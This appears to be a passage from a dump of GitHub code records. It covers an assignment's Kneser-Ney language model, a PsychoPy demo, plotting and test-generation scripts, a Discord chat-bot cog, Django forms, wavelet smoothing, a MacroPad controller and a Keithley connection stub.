for k,c in self.counts.items()}\n\n\n # Compute type fertilities, and the sum z_tf.\n self.type_fertility = {w:len(s) for w,s in self.type_contexts.items()}\n\n\n self.z_tf = float(sum(self.type_fertility.values()))\n\n\n # Freeze defaultdicts so we don't accidentally modify later.\n self.counts.default_factory = None\n self.type_contexts.default_factory = None\n\n # Total vocabulary size, for normalization\n self.words = list(self.counts[()].keys())\n self.V = len(self.words)\n\n def set_live_params(self, delta = 0.75, **params):\n self.delta = delta\n\n def kn_interp(self, word, context, delta, pw):\n \"\"\"Compute KN estimate P_kn(w | context) given a backoff probability\n\n Your code should implement the absolute discounting equation from the\n notebook, using the counts computed in __init__(). 
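As a rough worked example with hypothetical counts: if c(w | a, b) = 2, c(a, b) = 10, nnz(a, b) = 4 and delta = 0.75, the equation gives P_kn(w | a, b) = (2 - 0.75)/10 + 0.75*(4/10)*pw = 0.125 + 0.3*pw.\n        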
Note that you don't\n        need to deal with type fertilities here; this is handled in the\n        next_word_proba() function in the starter code, below.\n\n        Be sure you correctly handle the case where c(context) = 0, so as to not\n        divide by zero later on. You should just return the backoff probability\n        directly, since we have no information to decide otherwise.\n\n        Be sure that you don't modify the parameters of the model in this\n        function - in particular, you shouldn't (intentionally or otherwise)\n        insert zeros or empty dicts when you encounter an unknown word or\n        context. See note on dict.get() below.\n\n        Args:\n          word: (string) w in P(w | context )\n          context: (tuple of string)\n          delta: (float) discounting term\n          pw: (float) backoff P_kn(w | less_context), precomputed\n\n        Returns:\n          (float) P_kn(w | context)\n        \"\"\"\n        # Hint: self.counts.get(...) and self.context_totals.get(...) are\n        # useful here. See note in dict_notes.md about how this works.\n        c0 = self.counts.get(context, {}).get(word, 0)\n        z0 = self.context_totals.get(context, 0)\n        # If context is never seen, pass through backoff unchanged\n        if z0 == 0: return pw\n        # Interpolation factor alpha\n        alpha = delta * (self.context_nnz.get(context, 0) / z0)\n        pwc = max(0, c0 - delta)/z0\n        return pwc + alpha * pw\n\n\n    def next_word_proba(self, word, seq):\n        \"\"\"Compute next word probability with KN backoff smoothing.\n\n        Args:\n          word: (string) w in P(w | w_1 w_2 )\n          seq: list(string) [w_1, w_2, w_3, ...]\n\n        Returns:\n          (float) P_kn(w | w_1 w_2)\n        \"\"\"\n        delta = self.delta\n        # KN unigram, then recursively compute bigram, trigram\n        pw1 = self.type_fertility.get(word, 0.0) / self.z_tf\n        pw2 = self.kn_interp(word, tuple(seq[-1:]), delta, pw1)\n        pw3 = self.kn_interp(word, tuple(seq[-2:]), delta, pw2)\n        return pw3\n","repo_name":"datasci-w266/2021-spring-main","sub_path":"assignment/a5/kn_lm.py","file_name":"kn_lm.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"43165775475","text":"#!/usr/bin/env python\nfrom psychopy import visual, core, event, misc\n\"\"\"\nAs of version 1.51 the mouse coordinates for\n    myMouse.getPos()\n    myMouse.setPos() #pygame only\n    myMouse.getRel()\nare in the same units as the window.\n\nYou can also check the motion of the wheel with myMouse.getWheelRel() \n(in two directions for the mac mighty mouse or equivalent!)\n\"\"\"\n#create a window to draw in\nmyWin = visual.Window((600.0,600.0), allowGUI=True)\n\n#INITIALISE SOME STIMULI\nfixSpot = visual.PatchStim(myWin,tex=\"none\", mask=\"gauss\",\n        pos=(0,0), size=(0.05,0.05),color='black', autoLog=False)\ngrating = visual.PatchStim(myWin,pos=(0.5,0),\n                    tex=\"sin\",mask=\"gauss\",\n                    color=[1.0,0.5,-1.0],\n                    size=(1.0,1.0), sf=(3,0),\n                    autoLog=False)#this stim changes too much for autologging to be useful\nmyMouse = event.Mouse() # will use myWin by default\nmessage = visual.TextStim(myWin,pos=(-0.95,-0.9),alignHoriz='left',height=0.08,\n    text='left-drag=SF, right-drag=pos, scroll=ori',\n    autoLog=False)\n\nwhile True: #continue until keypress\n    #handle key presses each frame\n    for key in event.getKeys():\n        if key in ['escape','q']:\n            core.quit()\n    \n    #get mouse events\n    mouse_dX,mouse_dY = myMouse.getRel()\n    mouse1, mouse2, mouse3 = myMouse.getPressed()\n    if (mouse1):\n        grating.setSF(mouse_dX, '+')\n    elif (mouse3):\n        grating.setPos([mouse_dX, mouse_dY], '+')\n    \n    #Handle the wheel(s):\n    # Y is the normal mouse wheel, but 
some (e.g. mighty mouse) have an x as well\n    wheel_dX, wheel_dY = myMouse.getWheelRel()\n    grating.setOri(wheel_dY*5, '+')\n    \n    event.clearEvents()#get rid of other, unprocessed events\n    \n    #do the drawing\n    fixSpot.draw()\n    grating.setPhase(0.05, '+')#advance 0.05cycles per frame\n    grating.draw()\n    message.draw()\n    myWin.flip()#redraw the buffer\n\n","repo_name":"sloria/psychopy-project-template","sub_path":"psychopy/psychopy/demos/coder/input/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"68"} +{"seq_id":"1402511222","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef read_file_tum(filename):\n    with open(filename) as file:\n        data = file.read()\n    lines = data.replace(\",\", \" \").replace(\"\\t\", \" \").split(\"\\n\")\n    # renamed from 'list' to avoid shadowing the builtin\n    rows = [[v.strip() for v in line.split(\" \") if v.strip() != \"\"] for line in lines if\n            len(line) > 0 and line[0] != \"#\"]\n    rows = [l[1:] for l in rows if len(l) > 1]\n    return np.array(rows).astype(float)  # np.float was removed from modern numpy; use the builtin\n\n\n\nitypes = [\n    \"rgb\",\n    \"rgbd\",\n    \"d\",\n    \"o\",\n    \"do\",\n    \"rgbdo\",\n    \"rgbo\"\n]\nbasedir = \"/home/micha/dev/ml/orb_imitation/datagen/eval/trajectories/track3\"\n\n# plot ground truth\n# data = read_file_tum(basedir + f\"/groundtruth_trajectory_track3.tum\")\n# # print(data.shape)\n# xval = data[:, 0]\n# yval = data[:, 1]\n# plt.plot(xval, yval, label=\"min. snap\")\n\ndata = read_file_tum(basedir + f\"/actual_trajectory_track3.tum\")\n# print(data.shape)\nxval = data[:, 0]\nyval = data[:, 1]\nplt.plot(xval, yval, label=\"ground truth\", color=\"black\", linestyle=\"--\", linewidth=2)\n\nfor el in itypes:\n\n    data = read_file_tum(basedir + f\"/trajectory_{el}.tum\")\n    # print(data.shape)\n\n    xval = data[:, 0]\n    yval = data[:, 1]\n\n    plt.plot(xval, yval, label=el.upper())\nplt.grid()\nplt.legend()\nplt.ylabel(\"position y axis world frame [m]\")\nplt.xlabel(\"position x axis world frame [m]\")\nplt.show()\n\n","repo_name":"oludom/airsim_datagen","sub_path":"eval/plot_trajectories.py","file_name":"plot_trajectories.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15301076791","text":"from ntpath import join\nimport os\nimport math\nimport numpy as np\nimport itertools\nimport sympy as sp\nfrom prettytable import PrettyTable\n\nprint(\"Enter count of alternatives n: \",end='')\nn = int(input())\nprint(\"Enter count of experts m: \",end='')\nm = int(input())\nprint(\"Generate files? y/n: \",end='')\nis_generate_tests = input()\n\n# n = 3\n# m = 3\n\n# number of permutations with repetition of n! 
elements over m positions\ndef count_of_expert_profiles_variants(n, m):\n    if n == 1:\n        return 1\n    elif m == 1:\n        # number of ways to arrange n alternatives over n places (permutations)\n        return sp.factorial(n)\n    else: # each arrangement of the alternatives is one item that one or more experts may pick\n        return sp.factorial(sp.factorial(n) - 1 + m) / \\\n            ( sp.factorial(sp.factorial(n)-1) * sp.factorial(m) )\n\n\nmax_experts_num = 7\nmax_alternatives_num = 7\ntable_cnt_of_EPV = [[count_of_expert_profiles_variants(N+1, M+1) \nfor M in range(max_experts_num)]\nfor N in range(max_alternatives_num)]\n\ntable = PrettyTable()\ntable.field_names = [\"\"] + \\\n    ['m = {}'.format(M+1) for M in range(max_experts_num)]\nfor N in range(max_alternatives_num):\n    table.add_row(['n = {}'.format(N+1)] + \\\n        [table_cnt_of_EPV[N][M] for M in range(max_experts_num)])\ntable.align = 'l'\nprint(table)\n\n# =================================================\n\ndirectory_with_tests = os.getcwd()\n\n\ndef make_file(text, file_name):\n    file_txt = open(os.path.join(directory_with_tests, \"{}.txt\".format(file_name)), \"w\")\n    file_txt.write(text)\n    file_txt.close()\n\n\ndef list_to_string(List):\n    return \" \".join(map(str, List))\n\n\ndef lists_to_strings(Lists):\n    return \"\\n\".join(map(list_to_string, Lists))\n\n\ndef make_files_with_tests():\n    global n, m\n    single_profile_variants = list(\n        itertools.permutations([i+1 for i in range(n)]))\n    all_profiles_variants = list(itertools.combinations_with_replacement(\n        single_profile_variants, m))\n    number_len = len(str(table_cnt_of_EPV[n-1][m-1]))\n    for i in range(len(all_profiles_variants)):\n        text = lists_to_strings(all_profiles_variants[i])\n        make_file(text, 'n{0}m{1}_t{2:0>{3}d}'.format(n,m,i+1,number_len))\n\n\nif is_generate_tests == \"y\":\n    make_files_with_tests()\n    print(\"Files location:\", directory_with_tests)\n","repo_name":"GrapevineSnail/Tests_for_GroupChoiseAlgorythms","sub_path":"generate_tests_and_table_with_cnt_of_variants.py","file_name":"generate_tests_and_table_with_cnt_of_variants.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31742238494","text":"from config import CFG\nimport torch\nfrom transformers import pipeline\nfrom model import model,tokenizer\nfrom langchain.llms import HuggingFacePipeline\n\n\n\nmax_len=1040\n\npipe = pipeline(\n    task = \"text-generation\",\n    model = model,\n    tokenizer = tokenizer,\n    pad_token_id = tokenizer.eos_token_id,\n    max_length = max_len,\n    temperature = CFG.temperature,\n    top_p = CFG.top_p,\n    repetition_penalty = CFG.repetition_penalty\n)\n\nllm = HuggingFacePipeline(pipeline = pipe)","repo_name":"ogigo/llama-2_for_document_analysis","sub_path":"hf_pipeline.py","file_name":"hf_pipeline.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42911901291","text":"# https://www.acmicpc.net/problem/2293\r\n# title: Coin 1 (동전 1)\r\n# start: 2022-03-20 01:19:30 AM\r\n# end: 2022-03-20 04:09:00 AM\r\n\r\ndef solution(coin_list: list, K: int):\r\n    dp = [0] * (K+1)\r\n    dp[0] = 1\r\n\r\n    for coin in coin_list:\r\n        for number in range(coin, K + 1):\r\n            dp[number] = dp[number] + dp[number - coin]\r\n\r\n    return dp[K]\r\n\r\n\r\nif __name__ == '__main__':\r\n    num_coin, K = map(int, input().split())\r\n    coin_list = []\r\n    for _ in range(num_coin):\r\n        coin = int(input())\r\n        coin_list.append(coin)\r\n\r\n    
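# quick sanity check (hypothetical, not part of the original submission):\r\n    # solution([1, 2], 4) == 3, counting (1+1+1+1), (1+1+2) and (2+2)\r\n    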
result = solution(coin_list, K)\r\n    print(result)\r\n","repo_name":"SleepyCloud023/coding-test-study-note","sub_path":"Greedy/boj_2293/boj_2293.py","file_name":"boj_2293.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9836113268","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import MissingRequiredArgument, MissingPermissions\nfrom discord import Forbidden\nfrom discord.commands import slash_command, Option\nfrom discord.commands import permission\n\nfrom exceptions import *\nfrom data import Data\n\nfrom .logging import Logging\ndata = Data() # Connect to database\n\n\nclass Chat(commands.Cog):\n    def __init__(self, client):\n        self.client = client\n\n    @commands.Cog.listener()\n    async def on_message(self, message):\n        import re\n\n        if message.author.bot:\n            return\n\n        # check if the channel is muted\n        if data.get_guild(message.guild.id).get_channel(message.channel.id).muted_events:\n            return\n\n        # if the message contains 'hi', say 'hi'\n        if re.search(r\"hi\", message.content):\n            await message.channel.send('hi')\n\n        # if message has I'm followed by a sentence, say \"Hi , I'm Jerald\"\n        if re.search(r\"\\bi'?m ([\\s\\w]+)\\.?\", message.content, re.IGNORECASE):\n            sentence = re.search(\n                r\"\\bi'?m ([\\s\\w]+)\\.?\", message.content, re.IGNORECASE).group(1)\n            await message.channel.send(f\"Hi {sentence}, I'm Jerald\")\n\n        # if the message is all caps\n        if re.search(r\"^[A-Z\\s'!.?]+$\", message.content):\n            await message.channel.send(\n                f\"{message.author.mention} keep your voice down!\")\n\n    @slash_command(guild_ids=data.enabled_slash, name='mute_channel', description='Stop jerald from talking in the specified channel')\n    async def mute_channel(\n        self,\n        ctx,\n        channel: Option(discord.TextChannel, \"Channel to mute\",\n                        required=False, default=None),\n        all: Option(bool, \"Mute all channels\", required=False, default=False)\n    ):\n        \"\"\"\n        Stops Jerald from talking in the specified channel.\n        \"\"\"\n        # get the channel\n        channel = ctx.channel if channel is None else channel\n\n        # get the guild\n        guild_data = data.get_guild(ctx.guild.id)\n\n        if all:\n            channels_muted = []\n            for channel in ctx.guild.channels:\n                try:\n                    channel_data = guild_data.get_channel(channel.id)\n                except EntryNotFound:\n                    channel_data = guild_data.add_channel(\n                        channel.id, channel.name) # add the channel to the database\n\n                if not channel_data.muted_events:\n                    channel_data.muted_events = True\n                    # add channel to list of muted channels\n                    channels_muted.append(channel)\n\n            # Mention each channel\n            channels_muted = [c.mention for c in channels_muted]\n\n            # Joined string\n            channels_muted = '\\n'.join(channels_muted)\n\n            # Send response\n            response = discord.Embed(\n                title=\"Channels Muted\",\n                description=f\"The following channels have been muted:\\n{channels_muted}\",\n                color=0x00ff00\n            )\n\n            response = await ctx.respond(embed=response)\n\n            await Logging.log_command(ctx, action='Command',\n                                      extra=f\"Muted channels: {channels_muted}\")\n\n            return\n\n        # get the channel or add it if it doesn't exist\n        try:\n            channel_data = guild_data.get_channel(channel.id)\n        except EntryNotFound:\n            channel_data = guild_data.add_channel(channel.id, channel.name)\n\n        # Check if the channel is already muted\n        if channel_data.muted_events:\n            response = discord.Embed(\n                title=\"Channel already muted\",\n                description=f\"{channel.mention} is already muted\",\n                color=0xFFff00\n            )\n\n            response = await 
ctx.respond(embed=response)\n\n            await Logging.log_command(ctx, action='Command',\n                                      extra=f\"Failed to mute channel: {channel.name}\")\n\n            return\n\n        # mute the channel\n        channel_data.muted_events = True\n\n        # send a response\n        response = discord.Embed(\n            title=\"Channel Muted\",\n            description=f\"{channel.mention} has been muted\",\n            color=0x00ff00\n        )\n\n        response = await ctx.respond(embed=response)\n\n        await Logging.log_command(ctx, action='Command',\n                                  extra=f\"Muted channel: {channel.name}\")\n\n        return\n\n    @slash_command(guild_ids=data.enabled_slash, name='unmute_channel', description='Allow jerald to talk in this channel')\n    async def unmute_channel(\n        self,\n        ctx,\n        channel: Option(discord.TextChannel, \"Channel to unmute\",\n                        required=False, default=None),\n        all: Option(bool, \"Unmute all channels\", required=False, default=False)\n    ):\n        \"\"\"\n        Unmute the channel\n        \"\"\"\n        # get the channel\n        channel = ctx.channel if channel is None else channel\n\n        # get the guild\n        guild_data = data.get_guild(ctx.guild.id)\n\n        if all:\n            # unmute all channels\n            channels_unmuted = []\n            for channel in ctx.guild.channels:\n                try:\n                    channel_data = guild_data.get_channel(channel.id)\n                except EntryNotFound:\n                    # add the channel if it doesn't exist\n                    channel_data = guild_data.add_channel(\n                        channel.id, channel.name)\n\n                if channel_data.muted_events: # if the channel is muted\n                    channel_data.muted_events = False\n                    # add each channel unmuted to the list\n                    channels_unmuted.append(channel)\n\n            # Mention each channel\n            channels_unmuted = [c.mention for c in channels_unmuted]\n\n            # Joined string\n            channels_unmuted = '\\n'.join(channels_unmuted)\n\n            # Send a response\n            response = discord.Embed(\n                title=\"Channels Unmuted\",\n                description=f\"The following channels have been unmuted:\\n{channels_unmuted}\",\n                color=0x00ff00\n            )\n\n            response = await ctx.respond(embed=response)\n\n            await Logging.log_command(ctx, action='Command',\n                                      extra=f\"Unmuted channels: {channels_unmuted}\")\n\n            return\n\n        # get the channel or add it if it doesn't exist\n        try:\n            channel_data = guild_data.get_channel(channel.id)\n        except EntryNotFound:\n            channel_data = guild_data.add_channel(channel.id, channel.name)\n\n        # Check if the channel is already unmuted\n        if not channel_data.muted_events:\n            response = discord.Embed(\n                title=\"Channel already unmuted\",\n                description=f\"{channel.mention} is already unmuted\",\n                color=0xffff00\n            )\n\n            response = await ctx.respond(embed=response)\n\n            await Logging.log_command(ctx, action='Command',\n                                      extra=f\"Failed to unmute channel: {channel.name}\")\n\n            return\n\n        # unmute the channel\n        channel_data.muted_events = False\n\n        # send a response\n        response = discord.Embed(\n            title=\"Channel Unmuted\",\n            description=f\"{channel.mention} has been unmuted\",\n            color=0x00ff00\n        )\n\n        response = await ctx.respond(embed=response)\n\n        await Logging.log_command(ctx, action='Command',\n                                  extra=f\"Unmuted channel: {channel.name}\")\n\n        return\n\n\ndef setup(client):\n    client.add_cog(Chat(client))\n","repo_name":"Moulik-Budhiraja/Python-Discord-Bot","sub_path":"code/cogs/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"17646146233","text":"\nfrom django import forms\n\nfrom iyph.models import IyphPost,Chronology,Photo,ChronologyFiles\nfrom mezzanine.core.models import CONTENT_STATUS_DRAFT\nfrom django.contrib.admin.widgets import AdminDateWidget \nfrom django.forms.models import 
inlineformset_factory\nfrom django.forms.formsets import formset_factory\n# These fields need to be in the form, hidden, with default values,\n# since it posts to the blog post admin, which includes these fields\n# and will use empty values instead of the model defaults, without\n# these specified.\nhidden_field_defaults = (\"status\", \"gen_description\", \"allow_comments\")\n\n\nclass IyphPostForm(forms.ModelForm):\n \"\"\"\n Model form for ``IyphPost`` that provides the quick Iyph panel in the\n admin dashboard.\n \"\"\"\n\n class Meta:\n model = IyphPost\n fields = (\"title\", \"content\") + hidden_field_defaults\n\n def __init__(self):\n initial = {}\n for field in hidden_field_defaults:\n initial[field] = IyphPost._meta.get_field(field).default\n initial[\"status\"] = CONTENT_STATUS_DRAFT\n super(IyphPostForm, self).__init__(initial=initial)\n for field in hidden_field_defaults:\n self.fields[field].widget = forms.HiddenInput()\n\n\nclass ChronologyForm(forms.ModelForm):\n class Meta:\n model = Chronology\n fields = [\n 'title', \n 'image', \n 'programme_type',\n 'chron_type',\n 'start_date', \n 'end_date', \n 'summary',\n 'venue',\n 'country',\n 'venue_description',\n 'contact',\n 'url_website', \n ]\n exclude = ('author', 'status', 'publish_date', 'modify_date','chron_type','inhomepage','is_key_event')\n widgets = {\n 'start_date': AdminDateWidget(), \n 'end_date': AdminDateWidget(), \n }\nChronologyFilesFormSet = inlineformset_factory(Chronology, ChronologyFiles,extra=1)\n\nclass PhotoForm(forms.ModelForm):\n class Meta:\n model = Photo\n fields = [\n 'photographer_first_name',\n 'photographer_last_name',\n 'email',\n 'emailconfirmation', \n 'country',\n 'age',\n 'title',\n 'image', \n 'date_taken',\n 'place_taken',\n 'short_description', \n 'agree', \n ]\n exclude = ('modify_date','library', 'status', 'publish_date', 'finalist','exibition','prize')\n widgets = {\n 'photographer_first_name': forms.TextInput(attrs={'class':'zzz'}),\n 'photographer_last_name': forms.TextInput(attrs={'class':'zzz'}),\n 'email': forms.TextInput(attrs={'class':'zzz'}),\n 'emailconfirmation': forms.TextInput(attrs={'class':'zzz'}),\n 'country': forms.Select(attrs={'class':'zzz'}),\n 'age': forms.TextInput(attrs={'class':'zzz'}),\n 'title': forms.TextInput(attrs={'class':'zzz'}),\n 'date_taken': AdminDateWidget(), \n 'place_taken': forms.TextInput(attrs={'class':'zzz'}),\n 'short_description': forms.Textarea(attrs={'class':'zzz'}),\n } \n \n","repo_name":"ippc/ippcdj","sub_path":"iyph/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14559164095","text":"import numpy as np\nfrom scipy.ndimage import convolve1d\nfrom scipy.ndimage import median_filter\nfrom robust_stats import MAD\n\n\n# default spline wavelet scaling function\n_phi = np.array([1.0/16, 1.0/4, 3.0/8, 1.0/4, 1.0/16])\n\n\ndef up_sampling(a):\n \"\"\"Up-sampling an array by interleaving it with zero values.\"\"\"\n shp = a.shape\n shp1 = [ 2*i-1 for i in shp ]\n a1 = np.zeros(shp1, dtype=a.dtype)\n a1[[slice(None, None, 2) for i in shp]] = a\n\n return a1\n\n\ndef convolve(a, phi):\n \"\"\"Convolve `a` along each axis sequentially by `phi`.\"\"\"\n for ax in xrange(a.ndim):\n a = convolve1d(a, phi, axis=ax, mode='reflect')\n\n return a\n\n\ndef starlet_transform(a, level=None, gen2=False, approx_only=False, phi=_phi):\n \"\"\"Computes the starlet transform (i.e. 
the undecimated isotropic wavelet\n    transform) of an array.\n\n    The output is a python list containing the sub-bands. If the keyword Gen2\n    is set, then it is the 2nd generation starlet transform which is computed:\n    i.e., g = Id - h*h instead of g = Id - h.\n\n    \"\"\"\n\n    if level is None:\n        level = int(np.ceil(np.log2(np.min(a.shape))))\n\n    if level <= 0:\n        return [ a ]\n\n    phi = phi.astype(a.dtype)\n    W = []\n\n    for li in xrange(level):\n        if li > 0:\n            phi = up_sampling(phi)\n        approx = convolve(a, phi)\n        if not approx_only:\n            if gen2:\n                # 2nd generation starlet transform applies smoothing twice\n                W.append(a - convolve(approx, phi))\n            else:\n                W.append(a - approx)\n        a = approx\n\n    W.append(approx)\n\n    return W\n\n\ndef starlet_smooth(a, level=None, phi=_phi):\n    \"\"\"Return the smooth component of the first generation starlet transform.\"\"\"\n    return starlet_transform(a, level=level, gen2=False, approx_only=True, phi=phi)[0]\n\n\ndef starlet_detrend(a, level=None, phi=_phi):\n    \"\"\"Return the detrended component (i.e., smooth component being subtracted) of the first generation starlet transform.\"\"\"\n    return a - starlet_smooth(a, level, phi)\n\n\ndef multiscale_median_transform(a, level=None, scale=2, approx_only=False):\n    \"\"\"Multiscale median transform.\"\"\"\n\n    if level is None:\n        level = int(np.ceil(np.log2(np.min(a.shape))))\n\n    if level <= 0:\n        return [ a ]\n\n    W = []\n\n    for li in xrange(level):\n        if li > 0:\n            scale *= 2\n        approx = median_filter(a, 2*scale+1)\n        if not approx_only:\n            W.append(a - approx)\n        a = approx\n\n    W.append(approx)\n\n    return W\n\n\ndef multiscale_median_smooth(a, level=None, scale=2):\n    \"\"\"Return the smooth component of the multiscale median transform.\"\"\"\n    return multiscale_median_transform(a, level=level, scale=scale, approx_only=True)[0]\n\n\ndef multiscale_median_detrend(a, level=None, scale=2):\n    \"\"\"Return the detrended component (i.e., smooth component being subtracted) of the multiscale median transform.\"\"\"\n    return a - multiscale_median_smooth(a, level, scale)\n\n\ndef median_wavelet_transform(a, level=None, scale=2, tau=5.0, approx_only=False, phi=_phi):\n    \"\"\"Median-wavelet transform.\"\"\"\n\n    if level is None:\n        level = int(np.ceil(np.log2(np.min(a.shape))))\n\n    if level <= 0:\n        return [ a ]\n\n    phi = phi.astype(a.dtype)\n    W = []\n\n    for li in xrange(level):\n        if li > 0:\n            scale *= 2\n        approx = median_filter(a, 2*scale+1)\n        w = a - approx\n        th = tau * MAD(w)\n        # th = tau * MAD(w[w!=0])\n        w[np.abs(w) > th] = 0\n        approx += w\n        approx = starlet_smooth(approx, li+1, phi)\n\n        if not approx_only:\n            W.append(a - approx)\n        a = approx\n\n    W.append(approx)\n\n    return W\n\n\ndef median_wavelet_smooth(a, level=None, scale=2, tau=5.0, phi=_phi):\n    \"\"\"Return the smooth component of the median-wavelet transform.\"\"\"\n    return median_wavelet_transform(a, level=level, scale=scale, tau=tau, approx_only=True, phi=phi)[0]\n\n\ndef median_wavelet_detrend(a, level=None, scale=2, tau=5.0, phi=_phi):\n    \"\"\"Return the detrended component (i.e., smooth component being subtracted) of the median-wavelet transform.\"\"\"\n    return a - median_wavelet_smooth(a, level, scale, tau, phi)\n\n\ndef multiscale_median_flag(a, level=None, scale=2, tau=5.0, return_mask=True):\n\n    if level is None:\n        level = int(np.ceil(np.log2(np.min(a.shape))))\n\n    if return_mask:\n        mask = np.zeros_like(a, dtype=bool)\n\n    if level <= 0:\n        if return_mask:\n            return a, mask\n        else:\n            return a\n\n    for li in xrange(level):\n        if li > 0:\n            scale *= 2\n        approx = median_filter(a, 
2*scale+1)\n w = a - approx\n th = tau * MAD(w)\n # th = tau * MAD(w[w!=0])\n inds = np.where(np.abs(w) > th)[0]\n if return_mask:\n mask[inds] = True\n w[inds] = np.sign(w[inds]) * th\n a = approx + w\n\n if return_mask:\n return a, mask\n else:\n return a\n","repo_name":"TianlaiProject/tlpipe","sub_path":"tlpipe/utils/multiscale.py","file_name":"multiscale.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"68"} +{"seq_id":"74284976855","text":"from adafruit_macropad import MacroPad\nfrom collections import namedtuple\n\ntry:\n from typing import Iterable, Union\nexcept ImportError:\n pass\n\n# Event indicating the Encoder Button was pressed or released.\nEncoderButtonEvent = namedtuple(\"EncoderButtonEvent\", (\"pressed\",))\n\n# Event indicating the Encoder was rotated.\nEncoderEvent = namedtuple(\"EncoderEvent\", (\"position\", \"previous_position\"))\n\n# Event indicating a key was pressed or released.\nKeyEvent = namedtuple(\"KeyEvent\", (\"number\", \"pressed\"))\n\nclass Pad:\n\n # Initialize the Pad class (includes init of MacroPad, pixels, and encoder)\n def __init__(self):\n self.macropad = self._init_macropad()\n self.pixels = self.macropad.pixels\n\n self._last_encoder_position = self.encoder_position\n self._last_encoder_switch = self.encoder_switch\n\n # Initialize the MacroPad\n @classmethod\n def _init_macropad(cls, rotation: int = 0, midi_in_channel: int = 1, midi_out_channel: int = 1) -> MacroPad:\n \"\"\"Initialize the macropad.\n \n Args:\n rotation (int, optional): The rotation of the MacroPad. Defaults to 0.\n midi_in_channel (int, optional): The MIDI in channel. Defaults to 1.\n midi_out_channel (int, optional): The MIDI out channel. Defaults to 1.\n\n Returns:\n MacroPad: The initialized MacroPad.\n \"\"\"\n\n macropad = MacroPad(rotation, midi_in_channel, midi_out_channel)\n macropad.display.auto_refresh = False\n macropad.pixels.auto_write = False\n\n return macropad\n\n @property\n def encoder_position(self) -> int:\n \"\"\"Return the position of the encoder.\"\"\"\n\n return self.macropad.encoder\n\n @property\n def encoder_switch(self) -> bool:\n \"\"\"Return the state of the encoder switch.\"\"\"\n\n self.macropad.encoder_switch_debounced.update()\n return self.macropad.encoder_switch_debounced.pressed\n\n def event_stream(self) -> Iterable[Union[EncoderButtonEvent, EncoderEvent, KeyEvent]]:\n while True:\n yield from self.check_events()\n\n def check_events(self) -> Iterable[Union[EncoderButtonEvent, EncoderEvent, KeyEvent]]:\n \"\"\"Check for changes in state and return a tuple of events.\n\n Also execute any timers that are scheduled to run.\n\n Returns:\n Tuple[Union[EncoderButtonEvent, EncoderEvent, KeyEvent], ...]:\n A tuple of Events.\n \"\"\"\n \n position = self.encoder_position\n if position != self._last_encoder_position:\n last_encoder_position = self._last_encoder_position\n self._last_encoder_position = position\n yield EncoderEvent(position=position, previous_position=last_encoder_position)\n\n encoder_switch = self.encoder_switch\n if encoder_switch != self._last_encoder_switch:\n yield EncoderButtonEvent(pressed=encoder_switch)\n\n key_event = self.macropad.keys.events.get()\n if key_event:\n yield KeyEvent(number=key_event.key_number, pressed=key_event.pressed)\n\n yield from 
self.execute_ready_timers()  # note: execute_ready_timers is referenced but not defined in this file","repo_name":"CS-5/macropad","sub_path":"pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37893485765","text":"from sitio.models import Producto, Categoria\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom .models import Carrito\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required, permission_required\n\n# Create your views here.\n@login_required\ndef carrito(request): \n    carrito=Carrito(request)\n    return render(request, 'carrito/carrito.html', {\n        \"lista_categorias\": Categoria.objects.all()\n    })\n\ndef agregar(request, producto_id):\n    carrito=Carrito(request)\n    producto = get_object_or_404(Producto, id=producto_id)\n    carrito.agregar(producto=producto)\n    return redirect('carrito:carrito')\n\ndef quitar(request, producto_id):\n    carrito=Carrito(request)\n    producto=Producto.objects.get(id=producto_id)\n    carrito.quitar(producto=producto)\n    return redirect('carrito:carrito')\n\ndef eliminar(request, producto_id):\n    carrito=Carrito(request)\n    producto=Producto.objects.get(id=producto_id)\n    carrito.eliminar(producto=producto)\n    return redirect('carrito:carrito')\n\ndef limpiar(request):\n    carrito=Carrito(request)\n    carrito.limpiar()\n    return redirect('sitio:index')","repo_name":"aalabarces/TP-final","sub_path":"carrito/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42881178729","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport time  # used by spo() below\nimport visa\nimport Connection\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass connection_setup:\n    def __init__(self):\n        self.rm = visa.ResourceManager()\n        self.cmpl_current = 0.002 # default value 0.002A\n        self.cmpl_voltage = 2.0 # default value is 2V\n        self.query_time = 0.2 # default query time is 0.2 sec \n        self.keithley = None\n        self.pixelswitch = None\n        self.shutter = None\n    \n    def keithley_cmpl_current(self,cmpl_current):\n        self.cmpl_current = cmpl_current\n    \n    def keithley_query_time(self,query_time):\n        self.query_time = query_time\n    \n    def keithley_cmpl_voltage(self,cmpl_voltage):\n        self.cmpl_voltage = cmpl_voltage\n\n    def cnnct_keithley(self,gpib_name):\n        keithley = 